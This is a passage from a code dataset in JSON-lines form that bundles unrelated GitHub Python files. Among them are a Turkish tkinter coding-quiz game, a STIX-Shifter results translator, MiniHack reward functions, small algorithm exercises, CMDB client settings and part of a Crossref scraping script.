os.path.exists(YOL_1 + os.sep + dosya):\n pass\n else:\n yeni_dosya = open(YOL_1 + os.sep + dosya, 'w')\n #dosya adının ilk 5 harfi eval ile\n #tanımlanmış değişkenlere çevrilir.\n yeni_dosya.write(eval(dosya[0:5]))\n yeni_dosya.close()\n \n \n @classmethod\n def dosya_formatlayici(cls, dosya_adi):\n \"\"\"Python betik dosyalarını, programda\nkullanılabilecek şekilde formatlar.Başı # işareti ile\nbaşlayan soru satırlarını soru metni, kod satırlarını\nkod metni olarak döndürür.Bazı kod satırlarını\nsiler.\"\"\"\n soru_metni = \"\"\"\"\"\" \n betik = \"\"\"\"\"\"\n dosya_nesnesi = open(dosya_adi, 'r')\n \n for satir in dosya_nesnesi.readlines():\n if satir[0] == '#':\n yeni_satir = satir.replace('#', '')\n soru_metni += yeni_satir\n elif satir == os.linesep:\n pass\n else:\n #random sayı tek gelirse satırı sil.\n if rnd.randint(0,10) % 2 == 0:\n betik += satir\n else:\n betik += \"Bu satır silinmiştir.\" + os.linesep\n dosya_nesnesi.close()\n \n return soru_metni, betik\n \n @classmethod\n def dosya_sec(cls):\n \"\"\"soru dosyaları arasından rastgele bir\ndosyayı seçer ve okunmak için döndürür.\"\"\"\n dosya_listesi = os.listdir(YOL_1)\n rastgele_dosya = rnd.choice(dosya_listesi)\n \n return os.path.join(YOL_1, rastgele_dosya)\n \n @classmethod \n def cevap_dosyasi(cls, metin):\n \"cevap dosyası oluşturur ve metni içine yazar.\"\n dosya = open(os.path.join(YOL_3, \"cevap.py\"), 'w')\n dosya.write(metin)\n dosya.close()\n \n @classmethod\n def satir_sutun(cls, iki_boyutlu_liste):\n \"verilen 2 boyutlu listenin eleman sayısını bulur.\"\n toplam = 0\n for satir in iki_boyutlu_liste:\n for sutun in satir:\n toplam += 1\n \n return toplam\n \n \n \nclass Kronometre(tk.Label):\n \"\"\"Kronometre sınıfı.Bir taşıyıcının üstüne\nyapıştırılıp, istenilen süreyi tutar.Girilen\nsürenin sonunda string olarak girilen komutları\nçalıştırır.\"\"\"\n def __init__(self, tasiyici, sure, eylem, font=TIP_1):\n super().__init__(tasiyici)\n self.tasiyici = tasiyici\n self.sure = sure\n self.eylem = eylem\n self[\"text\"] = self.sure\n self[\"font\"] = font\n self.islem()\n \n def islem(self):\n \"\"\"Girilen süre dolduğunda girilen kodları\nçalıştırır.\"\"\"\n if self.sure <= 0:\n exec(self.eylem)\n else:\n self[\"text\"] = self.sure\n self.sure -= 1\n #süre değişimini etiket üstünde\n #gösterebilmek için taşıyıcısını günceller.\n self.after(1000, self.islem)\n \n def stop(self):\n #sürenin son değerini sabitler.\n self[\"text\"] = self.sure\n \nclass SoruToplevel(tk.Toplevel):\n \"\"\" '?' butonları için gereken toplevel sınıfıdır.\nKullanıcıya sorulacak soru ve kullanıcı girişi burada bulunur.\"\"\"\n def __init__(self, tasiyici, kontrolcu):\n super().__init__(tasiyici)\n \n self.kontrolcu = kontrolcu\n self.tasiyici = tasiyici\n \n self.wm_title(\"?\")\n self.resizable(width=False, height=False)#boyutu sabitle\n #eğer sayfa kapatılırsa oyunu sıfırla\n self.protocol(\"WM_DELETE_WINDOW\", self.patlama)\n \n self.kro = Kronometre(self, 60, \"self.tasiyici.patlama()\")\n self.kro.grid(row=3, column=0)\n \n self.soru_dosyasi = Islemler.dosya_sec()\n #soru metni ile betik ayrılır ve betiğin bazı satırları silinir.\n soru, betik = Islemler.dosya_formatlayici(self.soru_dosyasi)\n self.yrm = Islemler.yorumlayici_bul()#yorumlayıci bul\n \n self.soru_etiketi = tk.Label(self, text=soru,justify=tk.LEFT)\n self.soru_etiketi.grid(row=0, column=0)\n \n self.kod_girisi = tk.Text(self,background=\"black\",\n foreground=\"yellow\", \n insertbackground=\"yellow\")\n self.kod_girisi.grid(row=1, column=0)\n self.kod_girisi.insert(tk.END, betik)\n #kod giriş yerinde tab tuşunun sinyallerini\n #yakalar ve tab fonksiyonunu çalıştırır.\n self.kod_girisi.bind(\"\", self.tab)\n \n self.islem_butonu = tk.Button(self, text=\"Derle\",\n relief=tk.RAISED, command=self.islem)\n self.islem_butonu.grid(row=2, column=0)\n \n def tab(self, arg):\n \"\"\"Metin giriş yerinde python girintileme\nyapısına uygun tab boşluklarını oluşturur.\"\"\"\n #print(\"tab pressed\")\n self.kod_girisi.insert(tk.INSERT, \" \" * 4)\n return 'break'\n \n \n def islem(self):\n \"\"\"\nKullanıcının tamamladığı kod metnini çeker ve bunu\nbir betik dosyasına kaydeder.Sonra betik_islet fonksiyonu\nile kullancının girdiyse oluşan betiği ve ana betiği\nkarşılaştırır.\"\"\"\n kullanıcı_kodu = self.kod_girisi.get(\"1.0\", tk.END)\n Islemler.cevap_dosyasi(kullanıcı_kodu)\n kullanici_dosyasi = os.path.join(YOL_3, \"cevap.py\")\n cozum_cıktısı = Islemler.betik_islet([self.yrm, \n self.soru_dosyasi])\n k_cıktısı = Islemler.betik_islet([self.yrm, kullanici_dosyasi])\n if cozum_cıktısı[0] == k_cıktısı[0]:\n #kalan süre kadar puan ekle\n self.tasiyici.puan_etiketi[\"text\"] = str(eval(\n self.tasiyici.puan_etiketi[\"text\"]) + self.kro.sure)\n self.sayfayi_temizle()\n #görüntülenecek fotoğrafı oluştur.\n self.foto = tk.PhotoImage(file=os.path.join(YOL_4, \n \"tebrik.gif\"))\n self.etiket = tk.Label(self, image=self.foto)\n self.etiket.pack()\n \n self.buton = tk.Button(self, text=\"kapat\", \n command=self.sayfayi_kapat)\n self.buton.pack()\n \n else:\n self.patlama()\n \n def patlama(self):\n self.sayfayi_temizle()\n self.kontrolcu.sayfa_yenile([\"Oyun\"])\n \n self.foto = tk.PhotoImage(file=os.path.join(YOL_4, \n \"patlama.gif\"))\n self.etiket = tk.Label(self, image=self.foto)\n self.etiket.pack()\n \n self.buton = tk.Button(self, text=\"kapat\", \n command=self.sayfayi_kapat)\n self.buton.pack()\n \n def sayfayi_temizle(self):\n \"sayfadaki tüm eşyaları siler.\"\n for w in self.winfo_children():\n w.destroy()\n \n def sayfayi_kapat(self):\n self.destroy()\n\n \nif __name__ == \"__main__\":\n app = PythonBebegim()\n app.mainloop()\n","repo_name":"ilterisYucel/python_bebegim","sub_path":"python_bebegim.py","file_name":"python_bebegim.py","file_ext":"py","file_size_in_byte":25670,"program_lang":"python","lang":"tr","doc_type":"code","stars":1,"dataset":"github-code","pt":"95"} +{"seq_id":"10453302032","text":"# -*- coding: utf-8 -*-\n\"\"\"\nConverts native results into STIX observability objects.\n\nSee: https://docs.oasis-open.org/cti/stix/v2.0/stix-v2.0-part1-stix-core.html\n\"\"\"\nimport json\n\nfrom stix_shifter_utils.stix_translation.src.json_to_stix import json_to_stix_translator\nfrom stix_shifter_utils.stix_translation.src.json_to_stix.json_to_stix import JSONToStix\nfrom stix_shifter_utils.stix_translation.src.utils.exceptions import LoadJsonResultsException, TranslationResultException\n\n\nclass ResultsTranslator(JSONToStix):\n \"\"\"\n Class that converting native response JSON to SIX observability objects.\n\n See: https://github.com/opencybersecurityalliance/stix-shifter/blob/develop/adapter-guide/develop-translation-module.md\n\n :param options: configuration options, see: https://github.com/opencybersecurityalliance/stix-shifter/blob/develop/adapter-guide/develop-configuration-json.md\n :type options: object\n :param dialect: dialect of the data set, see: https://github.com/opencybersecurityalliance/stix-shifter/blob/develop/adapter-guide/develop-stix-adapter.md\n :type dialect: str\n :param base_file_path: base file path to look for STIX mapping specification\n :type base_file_path: str\n \"\"\"\n def __init__(self, options, dialect, base_file_path=None):\n super().__init__(options, dialect, base_file_path)\n\n def translate_results(self, data_source, data):\n \"\"\"\n Translates native data response into STIX object\n\n :param data_source: dialect specific model mapping data, see: https://github.com/opencybersecurityalliance/stix-shifter/blob/develop/adapter-guide/develop-translation-module.md#step-2-edit-the-from_stix_map-json-file\n :type data_source: str\n :param data: native data response\n :type data: str\n :return: native query response\n :rtype: STIX object\n \"\"\"\n try:\n json_data = json.loads(data)\n data_source = json.loads(data_source)\n except Exception as exc:\n raise LoadJsonResultsException() from exc\n\n try:\n mapped_data = self.map_data\n results = json_to_stix_translator.convert_to_stix(data_source, mapped_data, json_data, self.transformers, self.options, self.callback)\n except Exception as ex:\n raise TranslationResultException(\"Error when converting results to STIX: %s\" % ex) from ex\n\n return results\n","repo_name":"deepsiIBM/secretserver","sub_path":"stix_shifter_modules/infoblox/stix_translation/results_translator.py","file_name":"results_translator.py","file_ext":"py","file_size_in_byte":2418,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"11550579931","text":"from numpy import linalg\nimport numpy as np\nfrom collections import defaultdict\n\n# Load matrix\nmatrix = np.loadtxt(fname='numpy_data\\\\matrix.txt', delimiter=' ')\nprint(matrix)\n\n# Solve equations\ndef solve_equation(matrix):\n left_side, right_side = np.hsplit(matrix, [len(matrix)])\n result = linalg.solve(left_side, right_side)\n print(result)\n\n# Parse equation\nequations = ['2 x + 3 y = 5', 'x - y = 0']\nmatrix = None\n\nfor equation in equations:\n coeffs = defaultdict(int)\n elems = equation.split(' ')\n coeff = 1\n\n for elem in elems:\n if elem.isdigit():\n coeff = int(elem)\n elif elem.isalpha():\n coeffs[elem] = coeff\n elif elem == '-':\n coeff *= -1\n coeffs['='] = coeff\n equa = [np.array([coeffs[key] for key in coeffs])]\n\n if matrix is not None:\n matrix = np.concatenate((matrix, equa), axis=0)\n else:\n matrix = equa\n\nsolve_equation(matrix)\n","repo_name":"reyvateil/FI-MUNI-PV248","sub_path":"numpy_program.py","file_name":"numpy_program.py","file_ext":"py","file_size_in_byte":942,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"69826277100","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Nov 28 23:11:23 2021\n\n@author: user\n\"\"\"\n\n#프로그래머스\n#레벨1\n#예산\n\n\ndef solution(d, budget):\n answer = 0\n \n d = sorted(d)\n \n for i in range(len(d)) :\n if budget >= d[i] :\n budget -= d[i]\n answer += 1\n \n return answer","repo_name":"YOOHYOJEONG/algorithm_practice","sub_path":"programmers/Level01_practice/예산.py","file_name":"예산.py","file_ext":"py","file_size_in_byte":321,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"92"} +{"seq_id":"74929273900","text":"import numpy as np\nimport gym\nfrom nle import nethack\nfrom minihack import RewardManager\nfrom minihack import LevelGenerator\n\n#A function to get a string of the message of the current observation\ndef get_msg(obs):\n msg = obs[\"message\"]\n msg = msg.tobytes().decode(\"utf-8\")\n return msg\n\n#A function that gets the coordinates of a given glyph item in the observation\ndef glyph_pos(glyphs, glyph):\n glyph_positions = np.where(np.asarray(glyphs) == glyph)\n assert len(glyph_positions) == 2\n if glyph_positions[0].shape[0] == 0:\n return None\n return np.array([glyph_positions[0][0], glyph_positions[1][0]], dtype=np.float32)\n\n#A function that gets the inverse distance to the downard staircase \ndef distance_to_object(env, prev_obs, action, current_obs):\n glyphs = current_obs[env._observation_keys.index(\"chars\")]\n cur_pos = glyph_pos(glyphs, ord(\"@\"))\n staircase_pos = glyph_pos(glyphs, ord(\">\"))\n if staircase_pos is None:\n # Staircase has been reached\n return 0.0\n distance = np.linalg.norm(cur_pos - staircase_pos)\n distance /= np.max(glyphs.shape)\n return -distance \n\n#A function that gives a reward for expploring corridors of a cave \n#(characterised by the number of full stops uncovered)\ndef discover_maze(env, prev_obs, action, current_obs):\n curr_chars = current_obs[env._observation_keys.index(\"chars\")]\n prev_chars = prev_obs[env._observation_keys.index(\"chars\")]\n\n curr_dots = 0\n prev_dots = 0\n\n for row in curr_chars:\n for char in row:\n if char == ord(\".\"):\n curr_dots += 1\n\n for row in prev_chars:\n for char in row:\n if char == ord(\".\"):\n prev_dots += 1\n\n if curr_dots > prev_dots:\n return 0.1\n\n return 0.0\n\n#A function that gives a reward for expploring corridors of a cave \n#(characterised by the number of hastags uncovered in quest hard)\ndef discover_quest_hard(env, prev_obs, action, current_obs):\n curr_chars = current_obs[env._observation_keys.index(\"chars\")]\n prev_chars = prev_obs[env._observation_keys.index(\"chars\")]\n\n curr_dots = 0\n prev_dots = 0\n\n for row in curr_chars:\n for char in row:\n if char == ord(\"#\"):\n curr_dots += 1\n\n for row in prev_chars:\n for char in row:\n if char == ord(\"#\"):\n prev_dots += 1\n\n if curr_dots > prev_dots:\n return 0.1\n\n return 0.0\n\n#A function that gives a reward for expploring corridors of a cave and discovering the closed door\ndef discover_door(env, prev_obs, action, current_obs):\n curr_chars = current_obs[env._observation_keys.index(\"chars\")]\n prev_chars = prev_obs[env._observation_keys.index(\"chars\")]\n\n curr_dots = 0\n prev_dots = 0\n\n for row in curr_chars:\n for char in row:\n if char == ord(\"+\"):\n curr_dots += 1\n\n for row in prev_chars:\n for char in row:\n if char == ord(\"+\"):\n prev_dots += 1\n\n if curr_dots > prev_dots:\n return 0.1\n\n return 0.0\n\n#A function that gives a reward for expploring corridors of a cave and discovering the downward staircase\ndef discover_staircase(env, prev_obs, action, current_obs):\n curr_chars = current_obs[env._observation_keys.index(\"chars\")]\n prev_chars = prev_obs[env._observation_keys.index(\"chars\")]\n\n curr_staircase = 0\n prev_staircase = 0\n\n for row in curr_chars:\n for char in row:\n if char == ord(\">\"):\n curr_staircase += 1\n\n for row in prev_chars:\n for char in row:\n if char == ord(\">\"):\n prev_staircase += 1\n\n if curr_staircase > prev_staircase:\n return 0.5\n\n return 0.0\n\n\"\"\"\nA function to setup the given environment with the given configuration\n\"\"\"\ndef setup_environment(env_name, config):\n #Plain config, no rewards or custom actions or custom envs\n if config == \"plain\" and env_name != \"MiniHack-Skill-Custom-v0\":\n return gym.make(env_name, observation_keys = ['pixel', 'message', 'glyphs'])\n \n #Custom environemnt rewards, action\n else:\n reward_manager = RewardManager()\n ACTIONS = tuple(nethack.CompassDirection) \n\n #Custom room 5x5 configuration\n if env_name == \"MiniHack-Room-5x5-v0\":\n reward_manager.add_eat_event(\"apple\", reward = 1.0)\n reward_manager.add_location_event(\"staircase down\", 2.0)\n reward_manager.add_custom_reward_fn(distance_to_object)\n\n return gym.make(env_name, \n observation_keys = ['pixel', 'message', 'glyphs'], \n actions = ACTIONS, \n reward_manager=reward_manager)\n \n #Custom mazewalk configuration\n elif env_name == \"MiniHack-MazeWalk-9x9-v0\":\n reward_manager.add_eat_event(\"apple\", reward = 1.0)\n reward_manager.add_location_event(\"staircase down\", 2.0)\n reward_manager.add_custom_reward_fn(discover_maze)\n reward_manager.add_custom_reward_fn(discover_staircase)\n\n return gym.make(env_name, \n observation_keys = ['pixel', 'message', 'glyphs'], \n actions = ACTIONS, \n reward_manager=reward_manager)\n\n #Custom lava cross configuration\n elif env_name == \"MiniHack-LavaCross-Levitate-Potion-Inv-Full-v0\":\n reward_manager.add_eat_event(\"apple\", reward = 1.0)\n reward_manager.add_location_event(\"staircase down\", 2.0)\n reward_manager.add_message_event([\"drink\"], reward = 0.2, terminal_sufficient = False)\n reward_manager.add_message_event([\"float\"], reward = 0.5, terminal_sufficient = False)\n reward_manager.add_message_event([\"stone\", \"wall\"], reward = -0.3, terminal_sufficient = False)\n\n ACTIONS += (nethack.Command.QUAFF, nethack.Command.FIRE)\n\n return gym.make(env_name,\n observation_keys = ['pixel', 'message', 'glyphs'], \n actions = ACTIONS, \n reward_manager=reward_manager)\n \n #Custom quest hard configuration\n elif env_name == \"MiniHack-Quest-Hard-v0\":\n reward_manager.add_eat_event(\"apple\", reward = 1.0)\n reward_manager.add_location_event(\"staircase down\", 2.0)\n reward_manager.add_custom_reward_fn(discover_quest_hard)\n reward_manager.add_custom_reward_fn(discover_door)\n\n return gym.make(env_name, \n observation_keys = ['pixel', 'message', 'glyphs'], \n actions = ACTIONS, \n reward_manager=reward_manager)\n \n #Custom Eating Apples configuration with a custom environment\n elif env_name == \"MiniHack-Skill-Custom-v0\":\n lvl_gen = LevelGenerator(w=4, h=4)\n lvl_gen.add_object(\"apple\", \"%\", place=(3, 3))\n lvl_gen.set_start_pos((0, 1))\n\n reward_manager.add_eat_event(\"apple\", 1.0, terminal_sufficient = True)\n\n if config == \"config\":\n reward_manager.add_message_event([\"apple\", \"[ynq]\"], reward = 0.5, repeatable = False)\n\n ACTIONS += (\n nethack.Command.EAT,\n )\n \n return gym.make(\n \"MiniHack-Skill-Custom-v0\",\n observation_keys=(\"glyphs\", \"pixel\", \"message\"),\n des_file=lvl_gen.get_des(),\n reward_manager=reward_manager,\n actions=ACTIONS,\n )\n \n else:\n return gym.make(\n \"MiniHack-Skill-Custom-v0\",\n observation_keys=(\"glyphs\", \"pixel\", \"message\"),\n des_file=lvl_gen.get_des(),\n reward_manager=reward_manager,\n )\n","repo_name":"dami2106/minihack-project","sub_path":"Code/environment_manager.py","file_name":"environment_manager.py","file_ext":"py","file_size_in_byte":7980,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"43719014873","text":"def match_lists(a, b, f, no_dupes=False):\n # tries to match elements from the two lists\n # f is a function that can simplify the elements of the lists to try to get a match. for instance, str.lower\n # will return dictionaries containing the matches (using the original elements) as well as lists of mismatches\n # no_dupes=True will throw an exception one element matched duplicate elements of another list\n # matches will be in a list, unless no_dupes=True\n # tip: try running with no_dupes=True, then adjust if there are dupes\n default_val = None if no_dupes else []\n dic_a = {x:f(x) for x in a}\n dic_b = {x:f(x) for x in b}\n ret_a = {x:default_val for x in a}\n ret_b = {x:default_val for x in b}\n \n for ka, va in dic_a.items():\n for kb, vb in dic_b.items():\n if va == vb:\n if no_dupes:\n if ret_a[ka] != default_val:\n raise ValueError(f'duplicate matches for first list key {ka}')\n if ret_b[kb] != default_val:\n raise ValueError(f'duplicate matches for second list key {ka}')\n ret_a[ka] = kb\n ret_b[kb] = ka\n else:\n ret_a[ka].append(kb)\n ret_b[kb].append(ka)\n \n return [ret_a, ret_b, [x for x in ret_a if ret_a[x]==default_val], [x for x in ret_b if ret_b[x]==default_val]]\n\ndef full_matcher(a, b, functions, no_dupes=False):\n # see match_lists for documention\n # runs off a list of functions -- runs functions after the first only on mismatches\n ret = match_lists(a, b, functions[0], no_dupes)\n for f in functions[1:]:\n updated = match_lists(ret[2], ret[3], f, no_dupes)\n ret[0].update(updated[0])\n ret[1].update(updated[1])\n ret[2] = updated[2]\n ret[3] = updated[3]\n return ret\n\n## functions that might be helpful\ndef get_chr_remover_function(forbid_list:str):\n def ret_fn(s:str):\n ret = s\n for c in forbid_list:\n ret = ret.replace(c, '')\n return ret\n return ret_fn","repo_name":"BenKester/casting_eda","sub_path":"lab_runner/list_matcher.py","file_name":"list_matcher.py","file_ext":"py","file_size_in_byte":2109,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"40839256985","text":"import re\n\nf = open('popular-names.txt', 'r', encoding='utf-8')\nfile = f.read()\nf.close()\n\nchanged_file = re.sub('\\t', ' ', file)\n\ntexts = file.split('\\n')\nchanged_texts = changed_file.split('\\n')\n\nfor i in range(10):\n print(texts[i])\n print(changed_texts[i])","repo_name":"okada1220/100knock","sub_path":"100knock_chapter2/100knock_chapter2_11.py","file_name":"100knock_chapter2_11.py","file_ext":"py","file_size_in_byte":265,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"21950598920","text":"from django.urls import path\nfrom . import views\n\n\nurlpatterns = [\n path('', views.MainView.as_view(), name='Список объявлений'),\n path('fill_db/', views.FillDB.as_view(), name='Добавить записи в БД'),\n path('random/', views.RandomView.as_view(), name='Случайное объявление'),\n path('advertisements/', views.AdsListView.as_view(), name='Список объявлений'),\n path('advertisements//', views.AdsDetailView.as_view(), name='Список объявлений детали'),\n]\n","repo_name":"andreystashev/python_django","sub_path":"04_DatabasesAndModels/board/advertisements_app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":564,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"216988713","text":"\"\"\"\nThis module implements the class Entity\n\"\"\"\n\n\nclass Entity:\n\n def __init__(self, name):\n self.name = name\n self.freebase_id = None\n self.freebase_label = None\n self.kb_abstract = None\n self.kb_nouns = None\n self.similarity_score = None\n\n def __str__(self):\n return \"Entity____ NAME: {} , ID: {} , LABEL: {}\".format(self.name, self.freebase_id, self.freebase_label)\n\n","repo_name":"DoxopoulosPanos/WebData_assignment","sub_path":"scripts/entity.py","file_name":"entity.py","file_ext":"py","file_size_in_byte":426,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"4336965810","text":"# /bin/env python\n# -*- encode: utf-8 -*-\n__author__ = '@pedro1hen1'\n# Exercicio 08\n\"\"\"Faça um programa que calcule o valor total investido por um colecionador\nem sua coleção de CDs e o valor médio gasto em cada um deles.\nO usuário deverá informar a quantidade de CDs e o valor para em cada um.\"\"\"\n\n\ndef ex08():\n entry_cd = int(input(\"Insira o total de CDs adquiridos \\n \"))\n count = 0\n for i in range(1, entry_cd + 1):\n preco = float(input(\"Insira o preço pago por cada CD \"))\n count = (count + preco)\n media = (count / entry_cd)\n print(\"-total investido =\", count, \"$\")\n print(\"-valor gasto em cada CD =\", media, \"$\")\n\n\nex08()\n","repo_name":"pedro1hen1/treinamento","sub_path":"lista_04/ex08.py","file_name":"ex08.py","file_ext":"py","file_size_in_byte":672,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"19905900162","text":"from spacy import Language\nfrom typing import List\n\nfrom spacy.tokens import Doc, Span\n\nimport re\n\nfrom transformers import pipeline\n\ndef extract_triplets(text):\n \"\"\"\n Function to parse the generated text and extract the triplets\n \"\"\"\n triplets = []\n relation, subject, relation, object_ = '', '', '', ''\n text = text.strip()\n current = 'x'\n for token in text.replace(\"\", \"\").replace(\"\", \"\").replace(\"\", \"\").split():\n if token == \"\":\n current = 't'\n if relation != '':\n triplets.append({'head': subject.strip(), 'type': relation.strip(),'tail': object_.strip()})\n relation = ''\n subject = ''\n elif token == \"\":\n current = 's'\n if relation != '':\n triplets.append({'head': subject.strip(), 'type': relation.strip(),'tail': object_.strip()})\n object_ = ''\n elif token == \"\":\n current = 'o'\n relation = ''\n else:\n if current == 't':\n subject += ' ' + token\n elif current == 's':\n object_ += ' ' + token\n elif current == 'o':\n relation += ' ' + token\n if subject != '' and relation != '' and object_ != '':\n triplets.append({'head': subject.strip(), 'type': relation.strip(),'tail': object_.strip()})\n\n return triplets\n\n\n@Language.factory(\n \"rebel\",\n requires=[\"doc.sents\"],\n assigns=[\"doc._.rel\"],\n default_config={\n \"model_name\": \"Babelscape/rebel-large\",\n \"device\": 0,\n },\n)\nclass RebelComponent:\n def __init__(\n self,\n nlp,\n name,\n model_name: str,\n device: int,\n ):\n assert model_name is not None, \"\"\n self.triplet_extractor = pipeline(\"text2text-generation\", model=model_name, tokenizer=model_name, device=device)\n # Register custom extension on the Doc\n if not Doc.has_extension(\"rel\"):\n Doc.set_extension(\"rel\", default={})\n\n def _generate_triplets(self, sent: Span) -> List[dict]:\n output_ids = self.triplet_extractor(sent.text, return_tensors=True, return_text=False)[0][\"generated_token_ids\"][\"output_ids\"]\n extracted_text = self.triplet_extractor.tokenizer.batch_decode(output_ids[0])\n extracted_triplets = extract_triplets(extracted_text[0])\n return extracted_triplets\n\n def set_annotations(self, doc: Doc, triplets: List[dict]):\n for triplet in triplets:\n # get substring to spacy span\n head_span = re.search(triplet[\"head\"], doc.text)\n tail_span = re.search(triplet[\"tail\"], doc.text)\n # get spacy span\n if head_span is not None:\n head_span = doc.char_span(head_span.start(), head_span.end())\n else:\n head_span = triplet[\"head\"]\n if tail_span is not None:\n tail_span = doc.char_span(tail_span.start(), tail_span.end())\n else:\n tail_span = triplet[\"tail\"]\n offset = (head_span.start, tail_span.start)\n if offset not in doc._.rel:\n doc._.rel[offset] = {\"relation\": triplet[\"type\"], \"head_span\": head_span, \"tail_span\": tail_span}\n\n def __call__(self, doc: Doc) -> Doc:\n for sent in doc.sents:\n sentence_triplets = self._generate_triplets(sent)\n self.set_annotations(doc, sentence_triplets)\n return doc\n","repo_name":"ShamblenEX/rebel","sub_path":"spacy_component.py","file_name":"spacy_component.py","file_ext":"py","file_size_in_byte":3499,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"92"} +{"seq_id":"15745618884","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\nimport os\n\nBASEDIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n\n# 用于API认证的KEY\nKEY = '299095cc-1330-11e5-b06a-a45e60bec08b'\n# 用于API认证的请求头\nAUTH_KEY_NAME = 'auth-key'\n\n# 错误日志\nERROR_LOG_FILE = os.path.join(BASEDIR, \"log\", 'error.log')\n# 运行日志\nRUN_LOG_FILE = os.path.join(BASEDIR, \"log\", 'run.log')\n\n# Agent模式保存服务器唯一ID的文件\nCERT_FILE_PATH = os.path.join(BASEDIR, 'config', 'cert')\n\n# 是否测试模式,测试模时候数据从files目录下读取\nTEST_MODE = True\n\n# 采集资产的方式,选项有:agent(默认), salt, ssh\nMODE = 'ssh'\n\n# 如果采用SSH方式,则需要配置SSH的KEY和USER\nSSH_PRIVATE_KEY = \"/home/auto/.ssh/id_rsa\"\nSSH_USER = \"root\"\nSSH_PORT = 22\n\n# 采集硬件数据的插件\nPLUGINS_DICT = {\n 'cpu': 'src.plugins.cpu.CpuPlugin',\n 'disk': 'src.plugins.disk.DiskPlugin',\n 'main_board': 'src.plugins.main_board.MainBoardPlugin',\n 'memory': 'src.plugins.memory.MemoryPlugin',\n 'nic': 'src.plugins.nic.NicPlugin',\n}\n\n# 资产信息API\nASSET_API = \"http://127.0.0.1:8000/api/asset\"\n\"\"\"\nPOST时,返回值:{'code': xx, 'message': 'xx'}\n code:\n - 1000 成功;\n - 1001 接口授权失败;\n - 1002 数据库中资产不存在\n\"\"\"","repo_name":"WuPeiqi/Trainning","sub_path":"cmdb/AutoClient/config/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":1301,"program_lang":"python","lang":"zh","doc_type":"code","stars":4,"dataset":"github-code","pt":"92"} +{"seq_id":"35810724392","text":"# Definition for a binary tree node.\nclass TreeNode:\n def __init__(self, val=0, left=None, right=None):\n self.val = val\n self.left = left\n self.right = right\n\n\nclass Solution:\n def createBinaryTree(self, descriptions: [[int]]) -> [TreeNode]:\n node_dict = {}\n parent_dict = {}\n for p, c, l in descriptions:\n if p not in node_dict:\n p_node = TreeNode(p)\n node_dict[p] = p_node\n else:\n p_node = node_dict[p]\n if p not in parent_dict:\n parent_dict[p] = []\n if c not in parent_dict:\n parent_dict[c] = []\n if c not in node_dict:\n c_node = TreeNode(c)\n node_dict[c] = c_node\n else:\n c_node = node_dict[c]\n if l == 1:\n p_node.left = c_node\n else:\n p_node.right = c_node\n parent_dict[c].append(p)\n for k, v in parent_dict.items():\n if not v:\n return node_dict[k]\n","repo_name":"qq544259335/leetcode","sub_path":"LeetCodeWeekly/20220305-2/6018. Create Binary Tree From Descriptions.py","file_name":"6018. Create Binary Tree From Descriptions.py","file_ext":"py","file_size_in_byte":1084,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"13251518040","text":"\"\"\"This class helps to handle the data.\n\n\"\"\"\n\nimport logging\nimport tensorflow.compat.v1 as tf\nimport numpy as np\nfrom math import pi, cos, sin\n\nimport configs\n\nimport pdb\n\n\n# def _data_generator(dataset_config):\ndef _data_generator(dataset_size, dataset, anomalous):\n # dataset_size = dataset_config[0]\n # dataset = dataset_config[1]\n # generate dataset\n n = 0\n while n 5:\n raise ValueError(\"At least 5 sports\")\n\n profile = {\"name\": name, \"age\": age}\n\n if sports:\n profile[\"sports\"] = sorted(sports)\n\n if awards:\n profile[\"awards\"] = awards\n\n return profile\n","repo_name":"alehpineda/bitesofpy","sub_path":"36/profile.py","file_name":"profile.py","file_ext":"py","file_size_in_byte":367,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"19332967823","text":"from habanero import Crossref\nfrom habanero import cn\nfrom difflib import SequenceMatcher\nimport pybtex.database as db\nimport re\nimport csv\nimport yaml\nimport json\nimport urllib\n\ndef similar(a, b):\n return SequenceMatcher(None, a,b).ratio()\n\ncr = Crossref()\n\ndef getCrossRefBibData(doi_text):\n try:\n art_bib = json.loads(cn.content_negotiation(ids = doi_text, format = \"citeproc-json\"))\n return art_bib\n except:\n return {}\n\ndef jsonToPlainText(element):\n if isinstance(element, int) or \\\n isinstance(element, float) or \\\n isinstance(element, str):\n return element\n elif 'date-parts' in element:\n return element['date-parts'][0]\n elif 'issue' in element:\n return element['issue']\n elif isinstance(element, list) \\\n and len(element) > 0 and 'URL' in element[0]:\n return element[0]['URL']\n\ndef findURIFrag(uri, referents, contains):\n result = \"\"\n try:\n req = urllib.request.Request(uri)\n req.add_header('User-Agent', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36')\n req.add_header('CR-Clickthrough-Client-Token', '0ed86a82-c7d263a1-3015720c-a52a5080')\n article_page = urllib.request.urlopen(req)\n page_text = article_page.read()\n except Exception as e:\n page_text=\"\"\n print(e)\n for token in referents:\n start = str(page_text).lower().find(token.lower())\n if start > 0:\n end = start + 800\n result = str(page_text)[start:end]\n referred = result.lower().find(contains)\n if not referred > 0:\n result = \"not found in ack\"\n break\n return result\n \n# open articles csv file\ncatalysis_articles = {}\nfieldnames=[]\ninput_file = 